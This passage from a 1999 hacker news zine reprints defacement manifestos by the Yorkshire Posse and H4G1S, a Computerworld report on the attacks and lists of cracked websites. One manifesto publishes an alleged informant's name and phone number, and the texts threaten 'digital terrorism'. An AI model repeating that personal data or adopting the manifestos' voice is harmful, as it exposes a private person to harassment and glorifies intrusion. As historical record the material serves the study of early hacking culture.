message is archived on HNN... http://www.hackernews.com/archive/1999/oreilly/index.html * See archive for further details Brother Mandalo explains: On April 1st, 1998, Jason Mewhiney was arrested by the RCMP for allegedly defacing the NASA web page: http://www.hq.nasa.gov. This arrest was originally attributed by the press to a 3 year investigation by the RCMP/FBI. Nothing could be further by the t ruth. In actual truth, this arrest was the result of hearsay coming from a 20 year old paid informant by the name of Nick Potkay (whose phone # incidentally is: (203) 746-0734). It's nice that the FBI can make arrests in Canada based upon the word of a socially inept kid such as Nicholas Potkay isn't it? This is your wake up call, we are making a declaration of war against all who would challenge the freedom of Canadians with such ludicrous actions! We have broken into your phone companies, your breweries; everything you hold sacred! And we will contin ue to defile corporate Canadian privacy until the bullshit agendas of the Yanks are cast aside and realized for what they are! Let us examine for just a moment the bullshit tactics of NASA: The hack done at Nasa was merely a change to ONE file in the html directory, index.html and NASA claims it took over 200 man hours for them to correct this situation. Are we to believe that it takes 200 hours for a team of NASA employees to reinstall one computer and re-install the contents of that box from tape backup? These numbers are totally arbitrary. If these numbers are accurate, then it is not so difficult to imagine how a tragedy such as the Challenger explosion could occur! Your friendly neighbourhood "rocket scientists" at NASA are obviously fabricating these numbers in order to get the FBI to pursue Jason Mewhiney. Seventy-four thousand dollars to issue a couple of commands and replace the altered page? The calculators at NASA must have the zero key stuck or something. Seventy-four dollars perhaps, but seventy-four thousand? The painful reality is this:Jason is obviously a scapegoat for NASA's inability to secure their so called "critical" web site. And Brother Micherob elucidates: th3 fb1 4nd rcMp, al0ng w1th n4s4, kl41m th4t a k1d wh0 all3g3dly (ev1d3nc3 1z 3xtr3m3ly w34k) br0k3 1nt0 www.nasa.gov & ch4ng3d th31r w3bp4g3, h4z s0meh0w kAuz3d $70,000 w0rth 0f d4m4g3 & 200 h0urz 0f l0st m4n-t1m3 (t0 r3-1nst4ll a d1g1t4l un1x m4ch1n3) . pAus3 f()r a s3k0nd & l3tZ k0ns1d3r th1s.. n4s4 h4z 1n t0t4l 100z 0f th0u$4ndz 0f m4ch1n3zZ. 1ph th1z kl41m 0f 200 h0Urz 0f m4n t1m3 1z 3v3n r3m0t3lY r34l1$t1k, th1z w0Uld m34n n4sa h4z b33n 1nst4ll1ng b0x3z s1nc3 th3 1c3 4g3. l3tz ex4m1n3 th1Z sUm 0f $70,000.. 1n 0rd3r t0 r3st0r3 th3 p4g3, n4s4 d1d: # mv index.html.bak index.html (1t wUz b4ck3d uP by th3 'm4l1c10us 4nd 3v1l h4ck3r-tYp3' wh0 d1d 1t) 1ph th4t c0st $70,000 1t'z n0 w0nd3r th3 U.S. d3f1c1t 1z s0 hUg3.m4yb3 th3y sh0Uld ex4m1n3 th31r 3xp3nd1tUr3z 4 l1ttl3 m0r3 cl0Z3ly.. sUm1 sh0uld a$k th3m h0w mUch 1t k0zT u.s. t4xyp4y 3rz t0 flY RCMP p30pl3 d0wn, h4v3 th3m st4Y 1n h0t3lz & att3nd s3m1n4rz, h0w mUch th1$ tr14l 1z c0st1ng t0 b0th am3r1c4nz & k4n4d1aNz, 3tc., 3tc.. th3n s1t b4k & w4tch th3m 4tt3mpt t0 jU$t1fY th1s c1rcU$. Finally, some parting words from Brother Mandabarb: And so we come to an end of our diatribe. I hope you have enjoyed our spectacle. Remember -- in the future, question what your read. But most of all, phear -- For the Yorkshire Posse hath arrived. The original site that got hacked had these words on it: (NASA. 1998) (H4G1S > NASA) Gr33t1ngs fr0m th3 m3mb3rs 0f H4G1S. Our mission is to continue where our colleagues the ILF left off. During the next month, we the members of H4G1S, will be launching an attack on corporate America. All who profit from the misuse of the internet will fall victim to our upcoming reign of digital terrorism. Our privileged and highly skilled members will stop at nothing until our presence is felt nationwide. Even your most sophisticated firewalls are useless. We will demonstrate this in the upcoming weeks. THE COMMERCIALIZATION OF THE INTERNET STOPS HERE KEVIN MITNICK IS CURRENTLY IMPRISONED FOR NOTHING MORE THEN HIS CURIOUSITY AND DESIRE TO LEARN. KEVIN HAS BEEN ROTTING IN A PRISON CELL FOR 2 YEARS AND STILL HASN'T GONE TO TRIAL. ED CUMMINGS WAS THROWN IN PRISON FOR POSSESSING NOTHING OTHER THAN A COUPLE PIECES OF ELECTRONICS FROM RADIO SHACK. HIS COUNTRY DESTROYED HIS LIFE. WHILE IN PRISON CUMMINGS WAS SUBJECTED TO POOR PRISON CONDITIONS AND TREATED AS IF HE WERE A MURDERER. The injustice doesn't just end with Kevin Mitnick, there are others who have been targets of the government. Ed Cummings (aka BernieS) went to Prison for possessing a timing crystal (used in various el ectronic devices and can be purchased at Radio Shack) along with a Tone Dialer (also obtainable at Radio Shack). If you put these two things together in the right way, it is possible to use this device to trick the phone company into believing that you inserted a quarter into a payphone. Mr. Cummings never had these parts combined, and therefore never commited any crime. But NO, the government said he commited a crime, and what happens? He goes to prison because they say so. It wasn't hard to see th at things were going wrong for Mr. Cummings. A person being charged with man slaughter got bail set substantially lower then Mr. Cummings. Is itjust me or does that sound ridiculous? You can blame us Make every attempt to detain us You can make laws for us to break And "secure" your data for us to take A hacker, not by trade, but by BIRTHRIGHT. Some are born White, Some are born Black But the chaos chooses no c olor The chaos that encompasses our lives, all of our lives Driving us to HACK Deep inside, past the media, past the government, past ALL THE BULLSHIT: WE ARE ALL HACKERS Once it has you it never lets go. The conspiracy that saps our freedom, our humanity, our stability and security The self-propagating fruitless cycle that can only end by force If we must end this ourselves, we will stop at nothing This is a cry to America to GET IN TOUCH with the hacker inside YOU Take a step back and look around How much longer must my brothers suffer, for crimes subjectively declared ILLEGAL. All these fucking inbreds in office Stealing money from the coun try Writing bills to reduce your rights As the country just overlooks it PEOPLE OF AMERICA: IT'S TIME TO FIGHT. And FIGHT we WILL In the streets and from our homes In cyberspace and through the phones They are winning, by crushing our will Through this farce we call the media Through this farce we call capitalism Through this farce we call the JUSTICE SYSTEM Tell BernieS and Kevin Mitnick about Justice This is one strike, in what will soon become *MANY* For those of you at home, now, reading this, we ask you Please, not for Hagis, Not for your country, but for YOURSELF FIGHT THE WHITE DOG OPRESSOR Amen. http://www.computerworld.com/home/news.nsf/CWFlash/9904062hacker Canadian hackers attack 13 major corporate sites By Tom Diederich Several major corporate Web sites apparently were hacked into last Sunday evening by a group called the Yorkshire Posse. The group said 13 companies were targeted to protest the arrest last April of Canadian Jason Mewhiney, who is suspected of breaking into a NASA Web site and causing tens of thousands of dollars in damage. "I think they went for us because we were a high-profile site," said Sara Winge, a spokeswoman for information technology publisher O'Reilly & Associates Inc. in Sebastopol, Calif., one of the sites that was hit. "They were trying to get a message across about a Canadian hacker -- or cracker, I guess I should say -- who was being tried for computer crimes. But it didn't have anything to do with O'Reilly as a company." The hacked sites were replaced with a page that proclaimed a "declaration of war against all who would challenge the freedom of Canadians with such ludicrous actions!" The group claimed to have also hit Playboy.com, Sonymusic.com and a Sun Microsystems Inc. customer support site in Canada. Officials from those companies weren't available for comment at press time. Winge said O'Reilly was contacting the other 12 sites to learn how the attacks were carried out. "We obviously can't give a lot of detail, but we have prevented it from reoccurring at this point," she said. "All of our electronic-commerce offerings are on another server, which was not at all touched and has much heavier security," Winge added. She said the attack occurred late Sunday night and was fixed by 9 a.m. Monday morning. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] "" April 5th Rumoured cracked: www.deejay.it (from irc) April 6th Cracked (HNN Rumours section) Here are the reported cracks for today http://www.cnmaiz.com.mx/ http://www.weidenmiller.com http://www.windowsplanet.com http://www.cruzroja.org.mx http://www.oceanica.com.mx http://www.carnaval.com.mx http://www.alarmax.com.mx http://www.mazcity.com.mx http://www.exxor.com.mx http://www.bandaelrecodo.com.mx http://www.ibalpe.com.mx http://www.haciendadelmar.com.mx http://www.lasflores.com.mx http://www.grupotecnica.com.mx http://www.mazatlangolfking.com.mx April 7th contributed by Anonymous (HNN rumours section) Cracked The following sites have been reported as cracked: http://www.wrestlingtitan.com/ http://www.redmanfamily.net http://www.china.com http://www.zavallis.com/ http://www.mxcert.org.mx http://www.affiliatedrecords.com/ http://www.egallery.com/ http://www.zapnow.com/ http://www.thecaboose.com http://www.linux.org.mx April 8th Contributed by Anonymous (HNN rumours section) Cracked http://www.fibredust.com http://www.tentex.com April 9th http://www.e-dreamshop.com @HWA _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file Mirror sites: ~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]